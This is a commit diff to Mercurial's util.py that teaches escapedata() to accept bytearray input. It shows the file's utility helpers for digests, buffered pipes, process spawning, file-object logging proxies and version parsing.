util: teach escapedata() about bytearray...
Gregory Szorc
r36647:c98d1c67 default
@@ -1,4042 +1,4045 @@
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import codecs
21 21 import collections
22 22 import contextlib
23 23 import errno
24 24 import gc
25 25 import hashlib
26 26 import imp
27 27 import io
28 28 import itertools
29 29 import mmap
30 30 import os
31 31 import platform as pyplatform
32 32 import re as remod
33 33 import shutil
34 34 import signal
35 35 import socket
36 36 import stat
37 37 import string
38 38 import subprocess
39 39 import sys
40 40 import tempfile
41 41 import textwrap
42 42 import time
43 43 import traceback
44 44 import warnings
45 45 import zlib
46 46
47 47 from . import (
48 48 encoding,
49 49 error,
50 50 i18n,
51 51 node as nodemod,
52 52 policy,
53 53 pycompat,
54 54 urllibcompat,
55 55 )
56 56 from .utils import dateutil
57 57
58 58 base85 = policy.importmod(r'base85')
59 59 osutil = policy.importmod(r'osutil')
60 60 parsers = policy.importmod(r'parsers')
61 61
62 62 b85decode = base85.b85decode
63 63 b85encode = base85.b85encode
64 64
65 65 cookielib = pycompat.cookielib
66 66 empty = pycompat.empty
67 67 httplib = pycompat.httplib
68 68 pickle = pycompat.pickle
69 69 queue = pycompat.queue
70 70 socketserver = pycompat.socketserver
71 71 stderr = pycompat.stderr
72 72 stdin = pycompat.stdin
73 73 stdout = pycompat.stdout
74 74 stringio = pycompat.stringio
75 75 xmlrpclib = pycompat.xmlrpclib
76 76
77 77 httpserver = urllibcompat.httpserver
78 78 urlerr = urllibcompat.urlerr
79 79 urlreq = urllibcompat.urlreq
80 80
81 81 # workaround for win32mbcs
82 82 _filenamebytestr = pycompat.bytestr
83 83
84 84 def isatty(fp):
85 85 try:
86 86 return fp.isatty()
87 87 except AttributeError:
88 88 return False
89 89
90 90 # glibc determines buffering on first write to stdout - if we replace a TTY
91 91 # destined stdout with a pipe destined stdout (e.g. pager), we want line
92 92 # buffering
93 93 if isatty(stdout):
94 94 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
95 95
96 96 if pycompat.iswindows:
97 97 from . import windows as platform
98 98 stdout = platform.winstdout(stdout)
99 99 else:
100 100 from . import posix as platform
101 101
102 102 _ = i18n._
103 103
104 104 bindunixsocket = platform.bindunixsocket
105 105 cachestat = platform.cachestat
106 106 checkexec = platform.checkexec
107 107 checklink = platform.checklink
108 108 copymode = platform.copymode
109 109 executablepath = platform.executablepath
110 110 expandglobs = platform.expandglobs
111 111 explainexit = platform.explainexit
112 112 findexe = platform.findexe
113 113 getfsmountpoint = platform.getfsmountpoint
114 114 getfstype = platform.getfstype
115 115 gethgcmd = platform.gethgcmd
116 116 getuser = platform.getuser
117 117 getpid = os.getpid
118 118 groupmembers = platform.groupmembers
119 119 groupname = platform.groupname
120 120 hidewindow = platform.hidewindow
121 121 isexec = platform.isexec
122 122 isowner = platform.isowner
123 123 listdir = osutil.listdir
124 124 localpath = platform.localpath
125 125 lookupreg = platform.lookupreg
126 126 makedir = platform.makedir
127 127 nlinks = platform.nlinks
128 128 normpath = platform.normpath
129 129 normcase = platform.normcase
130 130 normcasespec = platform.normcasespec
131 131 normcasefallback = platform.normcasefallback
132 132 openhardlinks = platform.openhardlinks
133 133 oslink = platform.oslink
134 134 parsepatchoutput = platform.parsepatchoutput
135 135 pconvert = platform.pconvert
136 136 poll = platform.poll
137 137 popen = platform.popen
138 138 posixfile = platform.posixfile
139 139 quotecommand = platform.quotecommand
140 140 readpipe = platform.readpipe
141 141 rename = platform.rename
142 142 removedirs = platform.removedirs
143 143 samedevice = platform.samedevice
144 144 samefile = platform.samefile
145 145 samestat = platform.samestat
146 146 setbinary = platform.setbinary
147 147 setflags = platform.setflags
148 148 setsignalhandler = platform.setsignalhandler
149 149 shellquote = platform.shellquote
150 150 shellsplit = platform.shellsplit
151 151 spawndetached = platform.spawndetached
152 152 split = platform.split
153 153 sshargs = platform.sshargs
154 154 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
155 155 statisexec = platform.statisexec
156 156 statislink = platform.statislink
157 157 testpid = platform.testpid
158 158 umask = platform.umask
159 159 unlink = platform.unlink
160 160 username = platform.username
161 161
162 162 try:
163 163 recvfds = osutil.recvfds
164 164 except AttributeError:
165 165 pass
166 166 try:
167 167 setprocname = osutil.setprocname
168 168 except AttributeError:
169 169 pass
170 170 try:
171 171 unblocksignal = osutil.unblocksignal
172 172 except AttributeError:
173 173 pass
174 174
175 175 # Python compatibility
176 176
177 177 _notset = object()
178 178
179 179 # disable Python's problematic floating point timestamps (issue4836)
180 180 # (Python hypocritically says you shouldn't change this behavior in
181 181 # libraries, and sure enough Mercurial is not a library.)
182 182 os.stat_float_times(False)
183 183
184 184 def safehasattr(thing, attr):
185 185 return getattr(thing, attr, _notset) is not _notset
186 186
187 187 def _rapply(f, xs):
188 188 if xs is None:
189 189 # assume None means non-value of optional data
190 190 return xs
191 191 if isinstance(xs, (list, set, tuple)):
192 192 return type(xs)(_rapply(f, x) for x in xs)
193 193 if isinstance(xs, dict):
194 194 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
195 195 return f(xs)
196 196
197 197 def rapply(f, xs):
198 198 """Apply function recursively to every item preserving the data structure
199 199
200 200 >>> def f(x):
201 201 ... return 'f(%s)' % x
202 202 >>> rapply(f, None) is None
203 203 True
204 204 >>> rapply(f, 'a')
205 205 'f(a)'
206 206 >>> rapply(f, {'a'}) == {'f(a)'}
207 207 True
208 208 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
209 209 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
210 210
211 211 >>> xs = [object()]
212 212 >>> rapply(pycompat.identity, xs) is xs
213 213 True
214 214 """
215 215 if f is pycompat.identity:
216 216 # fast path mainly for py2
217 217 return xs
218 218 return _rapply(f, xs)
219 219
220 220 def bytesinput(fin, fout, *args, **kwargs):
221 221 sin, sout = sys.stdin, sys.stdout
222 222 try:
223 223 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
224 224 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
225 225 finally:
226 226 sys.stdin, sys.stdout = sin, sout
227 227
228 228 def bitsfrom(container):
229 229 bits = 0
230 230 for bit in container:
231 231 bits |= bit
232 232 return bits
233 233
234 234 # Python 2.6 still has deprecation warnings enabled by default. We do not want
235 235 # to display anything to the standard user, so detect if we are running tests and
236 236 # only use Python deprecation warnings in that case.
237 237 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
238 238 if _dowarn:
239 239 # explicitly unfilter our warning for python 2.7
240 240 #
241 241 # The option of setting PYTHONWARNINGS in the test runner was investigated.
242 242 # However, the module name set through PYTHONWARNINGS was matched exactly, so
243 243 # we cannot set 'mercurial' and have it match e.g. 'mercurial.scmutil'. This
244 244 # makes the whole PYTHONWARNINGS thing useless for our use case.
245 245 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
246 246 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
247 247 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
248 248 if _dowarn and pycompat.ispy3:
249 249 # silence warning emitted by passing user string to re.sub()
250 250 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
251 251 r'mercurial')
252 252
253 253 def nouideprecwarn(msg, version, stacklevel=1):
254 254 """Issue an python native deprecation warning
255 255
256 256 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
257 257 """
258 258 if _dowarn:
259 259 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
260 260 " update your code.)") % version
261 261 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
262 262
263 263 DIGESTS = {
264 264 'md5': hashlib.md5,
265 265 'sha1': hashlib.sha1,
266 266 'sha512': hashlib.sha512,
267 267 }
268 268 # List of digest types from strongest to weakest
269 269 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
270 270
271 271 for k in DIGESTS_BY_STRENGTH:
272 272 assert k in DIGESTS
273 273
274 274 class digester(object):
275 275 """helper to compute digests.
276 276
277 277 This helper can be used to compute one or more digests given their name.
278 278
279 279 >>> d = digester([b'md5', b'sha1'])
280 280 >>> d.update(b'foo')
281 281 >>> [k for k in sorted(d)]
282 282 ['md5', 'sha1']
283 283 >>> d[b'md5']
284 284 'acbd18db4cc2f85cedef654fccc4a4d8'
285 285 >>> d[b'sha1']
286 286 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
287 287 >>> digester.preferred([b'md5', b'sha1'])
288 288 'sha1'
289 289 """
290 290
291 291 def __init__(self, digests, s=''):
292 292 self._hashes = {}
293 293 for k in digests:
294 294 if k not in DIGESTS:
295 295 raise Abort(_('unknown digest type: %s') % k)
296 296 self._hashes[k] = DIGESTS[k]()
297 297 if s:
298 298 self.update(s)
299 299
300 300 def update(self, data):
301 301 for h in self._hashes.values():
302 302 h.update(data)
303 303
304 304 def __getitem__(self, key):
305 305 if key not in DIGESTS:
306 306 raise Abort(_('unknown digest type: %s') % key)
307 307 return nodemod.hex(self._hashes[key].digest())
308 308
309 309 def __iter__(self):
310 310 return iter(self._hashes)
311 311
312 312 @staticmethod
313 313 def preferred(supported):
314 314 """returns the strongest digest type in both supported and DIGESTS."""
315 315
316 316 for k in DIGESTS_BY_STRENGTH:
317 317 if k in supported:
318 318 return k
319 319 return None
320 320
321 321 class digestchecker(object):
322 322 """file handle wrapper that additionally checks content against a given
323 323 size and digests.
324 324
325 325 d = digestchecker(fh, size, {'md5': '...'})
326 326
327 327 When multiple digests are given, all of them are validated.
328 328 """
329 329
330 330 def __init__(self, fh, size, digests):
331 331 self._fh = fh
332 332 self._size = size
333 333 self._got = 0
334 334 self._digests = dict(digests)
335 335 self._digester = digester(self._digests.keys())
336 336
337 337 def read(self, length=-1):
338 338 content = self._fh.read(length)
339 339 self._digester.update(content)
340 340 self._got += len(content)
341 341 return content
342 342
343 343 def validate(self):
344 344 if self._size != self._got:
345 345 raise Abort(_('size mismatch: expected %d, got %d') %
346 346 (self._size, self._got))
347 347 for k, v in self._digests.items():
348 348 if v != self._digester[k]:
349 349 # i18n: first parameter is a digest name
350 350 raise Abort(_('%s mismatch: expected %s, got %s') %
351 351 (k, v, self._digester[k]))
352 352
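A minimal usage sketch (illustrative, not part of the module; the sha1 value is the digest of b'foo' shown in the digester doctest above):

    import io
    fh = io.BytesIO(b'foo')
    wrapped = digestchecker(fh, 3,
                            {'sha1': '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'})
    while wrapped.read(2):      # read through the wrapper as usual
        pass
    wrapped.validate()          # raises Abort on size or digest mismatch
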
353 353 try:
354 354 buffer = buffer
355 355 except NameError:
356 356 def buffer(sliceable, offset=0, length=None):
357 357 if length is not None:
358 358 return memoryview(sliceable)[offset:offset + length]
359 359 return memoryview(sliceable)[offset:]
360 360
361 361 closefds = pycompat.isposix
362 362
363 363 _chunksize = 4096
364 364
365 365 class bufferedinputpipe(object):
366 366 """a manually buffered input pipe
367 367
368 368 Python will not let us use buffered IO and lazy reading with 'polling' at
369 369 the same time. We cannot probe the buffer state and select will not detect
370 370 that data are ready to read if they are already buffered.
371 371
372 372 This class lets us work around that by implementing its own buffering
373 373 (allowing efficient readline) while offering a way to know if the buffer is
374 374 empty from the output (allowing collaboration of the buffer with polling).
375 375
376 376 This class lives in the 'util' module because it makes use of the 'os'
377 377 module from the python stdlib.
378 378 """
379 379 def __new__(cls, fh):
380 380 # If we receive a fileobjectproxy, we need to use a variation of this
381 381 # class that notifies observers about activity.
382 382 if isinstance(fh, fileobjectproxy):
383 383 cls = observedbufferedinputpipe
384 384
385 385 return super(bufferedinputpipe, cls).__new__(cls)
386 386
387 387 def __init__(self, input):
388 388 self._input = input
389 389 self._buffer = []
390 390 self._eof = False
391 391 self._lenbuf = 0
392 392
393 393 @property
394 394 def hasbuffer(self):
395 395 """True is any data is currently buffered
396 396
397 397 This will be used externally as a pre-step for polling IO. If there is
398 398 already buffered data then no polling should be put in place."""
399 399 return bool(self._buffer)
400 400
401 401 @property
402 402 def closed(self):
403 403 return self._input.closed
404 404
405 405 def fileno(self):
406 406 return self._input.fileno()
407 407
408 408 def close(self):
409 409 return self._input.close()
410 410
411 411 def read(self, size):
412 412 while (not self._eof) and (self._lenbuf < size):
413 413 self._fillbuffer()
414 414 return self._frombuffer(size)
415 415
416 416 def readline(self, *args, **kwargs):
417 417 if 1 < len(self._buffer):
418 418 # this should not happen because both read and readline end with a
419 419 # _frombuffer call that collapses it.
420 420 self._buffer = [''.join(self._buffer)]
421 421 self._lenbuf = len(self._buffer[0])
422 422 lfi = -1
423 423 if self._buffer:
424 424 lfi = self._buffer[-1].find('\n')
425 425 while (not self._eof) and lfi < 0:
426 426 self._fillbuffer()
427 427 if self._buffer:
428 428 lfi = self._buffer[-1].find('\n')
429 429 size = lfi + 1
430 430 if lfi < 0: # end of file
431 431 size = self._lenbuf
432 432 elif 1 < len(self._buffer):
433 433 # we need to take previous chunks into account
434 434 size += self._lenbuf - len(self._buffer[-1])
435 435 return self._frombuffer(size)
436 436
437 437 def _frombuffer(self, size):
438 438 """return at most 'size' data from the buffer
439 439
440 440 The data are removed from the buffer."""
441 441 if size == 0 or not self._buffer:
442 442 return ''
443 443 buf = self._buffer[0]
444 444 if 1 < len(self._buffer):
445 445 buf = ''.join(self._buffer)
446 446
447 447 data = buf[:size]
448 448 buf = buf[len(data):]
449 449 if buf:
450 450 self._buffer = [buf]
451 451 self._lenbuf = len(buf)
452 452 else:
453 453 self._buffer = []
454 454 self._lenbuf = 0
455 455 return data
456 456
457 457 def _fillbuffer(self):
458 458 """read data to the buffer"""
459 459 data = os.read(self._input.fileno(), _chunksize)
460 460 if not data:
461 461 self._eof = True
462 462 else:
463 463 self._lenbuf += len(data)
464 464 self._buffer.append(data)
465 465
466 466 return data
467 467
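A minimal sketch of the intended usage, assuming a POSIX pipe (illustrative only, not from the module):

    import os
    rfd, wfd = os.pipe()
    os.write(wfd, b'hello\nworld\n')
    os.close(wfd)
    pipe = bufferedinputpipe(os.fdopen(rfd, 'rb'))
    assert pipe.readline() == b'hello\n'
    assert pipe.hasbuffer           # b'world\n' already buffered: no need to poll
    assert pipe.read(5) == b'world'
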
468 468 def mmapread(fp):
469 469 try:
470 470 fd = getattr(fp, 'fileno', lambda: fp)()
471 471 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
472 472 except ValueError:
473 473 # Empty files cannot be mmapped, but mmapread should still work. Check
474 474 # if the file is empty, and if so, return an empty buffer.
475 475 if os.fstat(fd).st_size == 0:
476 476 return ''
477 477 raise
478 478
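A minimal sketch (illustrative; assumes a POSIX-like platform where the temporary file can be reopened while still open):

    import tempfile
    with tempfile.NamedTemporaryFile() as tmp:
        tmp.write(b'some revlog data')
        tmp.flush()
        data = mmapread(open(tmp.name, 'rb'))
        assert data[:4] == b'some'  # slicing an mmap yields bytes
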
479 479 def popen2(cmd, env=None, newlines=False):
480 480 # Setting bufsize to -1 lets the system decide the buffer size.
481 481 # The default for bufsize is 0, meaning unbuffered. This leads to
482 482 # poor performance on Mac OS X: http://bugs.python.org/issue4194
483 483 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
484 484 close_fds=closefds,
485 485 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
486 486 universal_newlines=newlines,
487 487 env=env)
488 488 return p.stdin, p.stdout
489 489
490 490 def popen3(cmd, env=None, newlines=False):
491 491 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
492 492 return stdin, stdout, stderr
493 493
494 494 def popen4(cmd, env=None, newlines=False, bufsize=-1):
495 495 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
496 496 close_fds=closefds,
497 497 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
498 498 stderr=subprocess.PIPE,
499 499 universal_newlines=newlines,
500 500 env=env)
501 501 return p.stdin, p.stdout, p.stderr, p
502 502
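A minimal sketch of popen2(), assuming a POSIX shell with 'cat' available (illustrative only):

    pin, pout = popen2(b'cat')
    pin.write(b'ping')
    pin.close()                 # close stdin so 'cat' sees EOF
    assert pout.read() == b'ping'
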
503 503 class fileobjectproxy(object):
504 504 """A proxy around file objects that tells a watcher when events occur.
505 505
506 506 This type is intended to only be used for testing purposes. Think hard
507 507 before using it in important code.
508 508 """
509 509 __slots__ = (
510 510 r'_orig',
511 511 r'_observer',
512 512 )
513 513
514 514 def __init__(self, fh, observer):
515 515 object.__setattr__(self, r'_orig', fh)
516 516 object.__setattr__(self, r'_observer', observer)
517 517
518 518 def __getattribute__(self, name):
519 519 ours = {
520 520 r'_observer',
521 521
522 522 # IOBase
523 523 r'close',
524 524 # closed is a property
525 525 r'fileno',
526 526 r'flush',
527 527 r'isatty',
528 528 r'readable',
529 529 r'readline',
530 530 r'readlines',
531 531 r'seek',
532 532 r'seekable',
533 533 r'tell',
534 534 r'truncate',
535 535 r'writable',
536 536 r'writelines',
537 537 # RawIOBase
538 538 r'read',
539 539 r'readall',
540 540 r'readinto',
541 541 r'write',
542 542 # BufferedIOBase
543 543 # raw is a property
544 544 r'detach',
545 545 # read defined above
546 546 r'read1',
547 547 # readinto defined above
548 548 # write defined above
549 549 }
550 550
551 551 # We only observe some methods.
552 552 if name in ours:
553 553 return object.__getattribute__(self, name)
554 554
555 555 return getattr(object.__getattribute__(self, r'_orig'), name)
556 556
557 557 def __delattr__(self, name):
558 558 return delattr(object.__getattribute__(self, r'_orig'), name)
559 559
560 560 def __setattr__(self, name, value):
561 561 return setattr(object.__getattribute__(self, r'_orig'), name, value)
562 562
563 563 def __iter__(self):
564 564 return object.__getattribute__(self, r'_orig').__iter__()
565 565
566 566 def _observedcall(self, name, *args, **kwargs):
567 567 # Call the original object.
568 568 orig = object.__getattribute__(self, r'_orig')
569 569 res = getattr(orig, name)(*args, **kwargs)
570 570
571 571 # Call a method on the observer of the same name with arguments
572 572 # so it can react, log, etc.
573 573 observer = object.__getattribute__(self, r'_observer')
574 574 fn = getattr(observer, name, None)
575 575 if fn:
576 576 fn(res, *args, **kwargs)
577 577
578 578 return res
579 579
580 580 def close(self, *args, **kwargs):
581 581 return object.__getattribute__(self, r'_observedcall')(
582 582 r'close', *args, **kwargs)
583 583
584 584 def fileno(self, *args, **kwargs):
585 585 return object.__getattribute__(self, r'_observedcall')(
586 586 r'fileno', *args, **kwargs)
587 587
588 588 def flush(self, *args, **kwargs):
589 589 return object.__getattribute__(self, r'_observedcall')(
590 590 r'flush', *args, **kwargs)
591 591
592 592 def isatty(self, *args, **kwargs):
593 593 return object.__getattribute__(self, r'_observedcall')(
594 594 r'isatty', *args, **kwargs)
595 595
596 596 def readable(self, *args, **kwargs):
597 597 return object.__getattribute__(self, r'_observedcall')(
598 598 r'readable', *args, **kwargs)
599 599
600 600 def readline(self, *args, **kwargs):
601 601 return object.__getattribute__(self, r'_observedcall')(
602 602 r'readline', *args, **kwargs)
603 603
604 604 def readlines(self, *args, **kwargs):
605 605 return object.__getattribute__(self, r'_observedcall')(
606 606 r'readlines', *args, **kwargs)
607 607
608 608 def seek(self, *args, **kwargs):
609 609 return object.__getattribute__(self, r'_observedcall')(
610 610 r'seek', *args, **kwargs)
611 611
612 612 def seekable(self, *args, **kwargs):
613 613 return object.__getattribute__(self, r'_observedcall')(
614 614 r'seekable', *args, **kwargs)
615 615
616 616 def tell(self, *args, **kwargs):
617 617 return object.__getattribute__(self, r'_observedcall')(
618 618 r'tell', *args, **kwargs)
619 619
620 620 def truncate(self, *args, **kwargs):
621 621 return object.__getattribute__(self, r'_observedcall')(
622 622 r'truncate', *args, **kwargs)
623 623
624 624 def writable(self, *args, **kwargs):
625 625 return object.__getattribute__(self, r'_observedcall')(
626 626 r'writable', *args, **kwargs)
627 627
628 628 def writelines(self, *args, **kwargs):
629 629 return object.__getattribute__(self, r'_observedcall')(
630 630 r'writelines', *args, **kwargs)
631 631
632 632 def read(self, *args, **kwargs):
633 633 return object.__getattribute__(self, r'_observedcall')(
634 634 r'read', *args, **kwargs)
635 635
636 636 def readall(self, *args, **kwargs):
637 637 return object.__getattribute__(self, r'_observedcall')(
638 638 r'readall', *args, **kwargs)
639 639
640 640 def readinto(self, *args, **kwargs):
641 641 return object.__getattribute__(self, r'_observedcall')(
642 642 r'readinto', *args, **kwargs)
643 643
644 644 def write(self, *args, **kwargs):
645 645 return object.__getattribute__(self, r'_observedcall')(
646 646 r'write', *args, **kwargs)
647 647
648 648 def detach(self, *args, **kwargs):
649 649 return object.__getattribute__(self, r'_observedcall')(
650 650 r'detach', *args, **kwargs)
651 651
652 652 def read1(self, *args, **kwargs):
653 653 return object.__getattribute__(self, r'_observedcall')(
654 654 r'read1', *args, **kwargs)
655 655
656 656 class observedbufferedinputpipe(bufferedinputpipe):
657 657 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
658 658
659 659 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
660 660 bypass ``fileobjectproxy``. Because of this, we need to make
661 661 ``bufferedinputpipe`` aware of these operations.
662 662
663 663 This variation of ``bufferedinputpipe`` can notify observers about
664 664 ``os.read()`` events. It also re-publishes other events, such as
665 665 ``read()`` and ``readline()``.
666 666 """
667 667 def _fillbuffer(self):
668 668 res = super(observedbufferedinputpipe, self)._fillbuffer()
669 669
670 670 fn = getattr(self._input._observer, r'osread', None)
671 671 if fn:
672 672 fn(res, _chunksize)
673 673
674 674 return res
675 675
676 676 # We use different observer methods because the operation isn't
677 677 # performed on the actual file object but on us.
678 678 def read(self, size):
679 679 res = super(observedbufferedinputpipe, self).read(size)
680 680
681 681 fn = getattr(self._input._observer, r'bufferedread', None)
682 682 if fn:
683 683 fn(res, size)
684 684
685 685 return res
686 686
687 687 def readline(self, *args, **kwargs):
688 688 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
689 689
690 690 fn = getattr(self._input._observer, r'bufferedreadline', None)
691 691 if fn:
692 692 fn(res)
693 693
694 694 return res
695 695
696 696 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
697 697 DATA_ESCAPE_MAP.update({
698 698 b'\\': b'\\\\',
699 699 b'\r': br'\r',
700 700 b'\n': br'\n',
701 701 })
702 702 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
703 703
704 704 def escapedata(s):
705 if isinstance(s, bytearray):
706 s = bytes(s)
707
705 708 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
706 709
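This is the change the commit describes: escapedata() now coerces bytearray input to bytes before the regexp substitution. A minimal sketch of the resulting behavior (values are illustrative, not from the test suite):

    # Sketch: bytes and bytearray inputs now escape identically.
    payload = bytearray(b'abc\ndef\x00')
    assert escapedata(payload) == b'abc\\ndef\\x00'
    assert escapedata(payload) == escapedata(bytes(payload))
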
707 710 class fileobjectobserver(object):
708 711 """Logs file object activity."""
709 712 def __init__(self, fh, name, reads=True, writes=True, logdata=False):
710 713 self.fh = fh
711 714 self.name = name
712 715 self.logdata = logdata
713 716 self.reads = reads
714 717 self.writes = writes
715 718
716 719 def _writedata(self, data):
717 720 if not self.logdata:
718 721 self.fh.write('\n')
719 722 return
720 723
721 724 # Simple case writes all data on a single line.
722 725 if b'\n' not in data:
723 726 self.fh.write(': %s\n' % escapedata(data))
724 727 return
725 728
726 729 # Data with newlines is written to multiple lines.
727 730 self.fh.write(':\n')
728 731 lines = data.splitlines(True)
729 732 for line in lines:
730 733 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
731 734
732 735 def read(self, res, size=-1):
733 736 if not self.reads:
734 737 return
735 738 # Python 3 can return None from reads at EOF instead of empty strings.
736 739 if res is None:
737 740 res = ''
738 741
739 742 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
740 743 self._writedata(res)
741 744
742 745 def readline(self, res, limit=-1):
743 746 if not self.reads:
744 747 return
745 748
746 749 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
747 750 self._writedata(res)
748 751
749 752 def write(self, res, data):
750 753 if not self.writes:
751 754 return
752 755
753 756 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
754 757 self._writedata(data)
755 758
756 759 def flush(self, res):
757 760 if not self.writes:
758 761 return
759 762
760 763 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
761 764
762 765 # For observedbufferedinputpipe.
763 766 def bufferedread(self, res, size):
764 767 self.fh.write('%s> bufferedread(%d) -> %d' % (
765 768 self.name, size, len(res)))
766 769 self._writedata(res)
767 770
768 771 def bufferedreadline(self, res):
769 772 self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
770 773 self._writedata(res)
771 774
772 775 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
773 776 logdata=False):
774 777 """Turn a file object into a logging file object."""
775 778
776 779 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
777 780 logdata=logdata)
778 781 return fileobjectproxy(fh, observer)
779 782
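A minimal sketch (illustrative): wrapping an in-memory file object and observing a write. The log handle receives lines formatted by fileobjectobserver, with payloads escaped via escapedata().

    import io
    logh = io.BytesIO()
    fh = makeloggingfileobject(logh, io.BytesIO(), 'wire', logdata=True)
    fh.write(b'capabilities')
    # logh now holds something like: wire> write(12) -> 12: capabilities
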
780 783 def version():
781 784 """Return version information if available."""
782 785 try:
783 786 from . import __version__
784 787 return __version__.version
785 788 except ImportError:
786 789 return 'unknown'
787 790
788 791 def versiontuple(v=None, n=4):
789 792 """Parses a Mercurial version string into an N-tuple.
790 793
791 794 The version string to be parsed is specified with the ``v`` argument.
792 795 If it isn't defined, the current Mercurial version string will be parsed.
793 796
794 797 ``n`` can be 2, 3, or 4. Here is how some version strings map to
795 798 returned values:
796 799
797 800 >>> v = b'3.6.1+190-df9b73d2d444'
798 801 >>> versiontuple(v, 2)
799 802 (3, 6)
800 803 >>> versiontuple(v, 3)
801 804 (3, 6, 1)
802 805 >>> versiontuple(v, 4)
803 806 (3, 6, 1, '190-df9b73d2d444')
804 807
805 808 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
806 809 (3, 6, 1, '190-df9b73d2d444+20151118')
807 810
808 811 >>> v = b'3.6'
809 812 >>> versiontuple(v, 2)
810 813 (3, 6)
811 814 >>> versiontuple(v, 3)
812 815 (3, 6, None)
813 816 >>> versiontuple(v, 4)
814 817 (3, 6, None, None)
815 818
816 819 >>> v = b'3.9-rc'
817 820 >>> versiontuple(v, 2)
818 821 (3, 9)
819 822 >>> versiontuple(v, 3)
820 823 (3, 9, None)
821 824 >>> versiontuple(v, 4)
822 825 (3, 9, None, 'rc')
823 826
824 827 >>> v = b'3.9-rc+2-02a8fea4289b'
825 828 >>> versiontuple(v, 2)
826 829 (3, 9)
827 830 >>> versiontuple(v, 3)
828 831 (3, 9, None)
829 832 >>> versiontuple(v, 4)
830 833 (3, 9, None, 'rc+2-02a8fea4289b')
831 834 """
832 835 if not v:
833 836 v = version()
834 837 parts = remod.split('[\+-]', v, 1)
835 838 if len(parts) == 1:
836 839 vparts, extra = parts[0], None
837 840 else:
838 841 vparts, extra = parts
839 842
840 843 vints = []
841 844 for i in vparts.split('.'):
842 845 try:
843 846 vints.append(int(i))
844 847 except ValueError:
845 848 break
846 849 # (3, 6) -> (3, 6, None)
847 850 while len(vints) < 3:
848 851 vints.append(None)
849 852
850 853 if n == 2:
851 854 return (vints[0], vints[1])
852 855 if n == 3:
853 856 return (vints[0], vints[1], vints[2])
854 857 if n == 4:
855 858 return (vints[0], vints[1], vints[2], extra)
856 859
857 860 def cachefunc(func):
858 861 '''cache the result of function calls'''
859 862 # XXX doesn't handle keyword args
860 863 if func.__code__.co_argcount == 0:
861 864 cache = []
862 865 def f():
863 866 if len(cache) == 0:
864 867 cache.append(func())
865 868 return cache[0]
866 869 return f
867 870 cache = {}
868 871 if func.__code__.co_argcount == 1:
869 872 # we gain a small amount of time because
870 873 # we don't need to pack/unpack the list
871 874 def f(arg):
872 875 if arg not in cache:
873 876 cache[arg] = func(arg)
874 877 return cache[arg]
875 878 else:
876 879 def f(*args):
877 880 if args not in cache:
878 881 cache[args] = func(*args)
879 882 return cache[args]
880 883
881 884 return f
882 885
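A minimal sketch of the single-argument fast path (illustrative only):

    calls = []
    def square(x):
        calls.append(x)
        return x * x
    fsquare = cachefunc(square)
    assert fsquare(3) == 9 and fsquare(3) == 9
    assert calls == [3]         # the wrapped function ran only once
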
883 886 class cow(object):
884 887 """helper class to make copy-on-write easier
885 888
886 889 Call preparewrite before doing any writes.
887 890 """
888 891
889 892 def preparewrite(self):
890 893 """call this before writes, return self or a copied new object"""
891 894 if getattr(self, '_copied', 0):
892 895 self._copied -= 1
893 896 return self.__class__(self)
894 897 return self
895 898
896 899 def copy(self):
897 900 """always do a cheap copy"""
898 901 self._copied = getattr(self, '_copied', 0) + 1
899 902 return self
900 903
901 904 class sortdict(collections.OrderedDict):
902 905 '''a simple sorted dictionary
903 906
904 907 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
905 908 >>> d2 = d1.copy()
906 909 >>> d2
907 910 sortdict([('a', 0), ('b', 1)])
908 911 >>> d2.update([(b'a', 2)])
